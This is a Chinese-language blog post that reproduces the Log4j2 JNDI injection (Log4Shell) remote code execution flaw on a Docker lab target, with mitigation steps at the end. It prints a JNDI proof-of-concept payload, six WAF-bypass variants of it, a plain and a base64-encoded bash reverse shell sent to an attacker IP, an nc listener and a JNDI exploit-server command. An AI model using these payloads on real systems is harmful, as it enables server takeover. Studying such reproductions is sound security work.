前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Log4j2漏洞复现

Log4j2漏洞复现

作者头像
R0A1NG
发布2022-02-19 10:20:31
1.8K0
发布2022-02-19 10:20:31
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

原理

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。 https://mp.weixin.qq.com/s/15zcLEk6_x2enszhim9afA

影响版本

Apache Log4j 2.x <= 2.14.1

poc

${jndi:ldap://xxx.dnslog.cn/poc} waf绕过

  1. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://xxx.dnslog.cn/poc}
  2. ${${::-j}ndi:rmi://xxx.dnslog.cn/poc}
  3. ${jndi:rmi://xxx.dnslog.cn/poc}
  4. ${${lower:jndi}:${lower:rmi}://xxx.dnslog.cn/poc}
  5. ${${lower:${lower:jndi}}:${lower:rmi}://xxx.dnslog.cn/poc}
  6. ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.dnslog.cn/poc}

RCE利用

靶机:http://192.168.223.129:8080/

靶机搭建:

1.平台环境 http://vulfocus.fofa.so/ 2.本地搭建

docker pull vulfocus/log4j2-rce-2021-12-09:latest docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest

复现过程

先用dnslog测试一下

2021-12-14T09:29:58.png
2021-12-14T09:29:58.png
2021-12-14T09:30:14.png
2021-12-14T09:30:14.png

1.​构造一个LDAP或者RMI服务器。 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 构造payload:

bash -i > /dev/tcp/192.168.223.131/8566 0>&1

监听端口

nc -lvnp 8566

https://www.jackson-t.ca/runtime-exec-payloads.html转换一下

2021-12-14T10:09:01.png
2021-12-14T10:09:01.png

bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i}

开启工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE5Mi4xNjguMjIzLjEzMS84NTY2IDA+JjE=}|{base64,-d}|{bash,-i}" -A "192.168.223.131" -C payload -A 攻击机的IP

2021-12-14T10:11:27.png
2021-12-14T10:11:27.png

这里有多个java版本的exp,如果不成功可以换个版本

2021-12-14T10:12:16.png
2021-12-14T10:12:16.png

执行成功,成功获取shell

2021-12-14T10:12:46.png
2021-12-14T10:12:46.png

修复

代码语言:javascript
复制
 1. 升级最新版本
 2. 设置jvm参数"-Dlog4j2.formatMsgNoLookups=true";
 3. 设置系统环境变量"FORMAT_MESSAGES_PATTERN_DIS-ABLE_LOOKU_PS"为"true"
 4. 关闭应用的网络外连。
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 12 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 原理
  • 影响版本
  • poc
  • RCE利用
    • 靶机搭建:
      • 复现过程
      • 修复
      相关产品与服务
      容器镜像服务
      容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档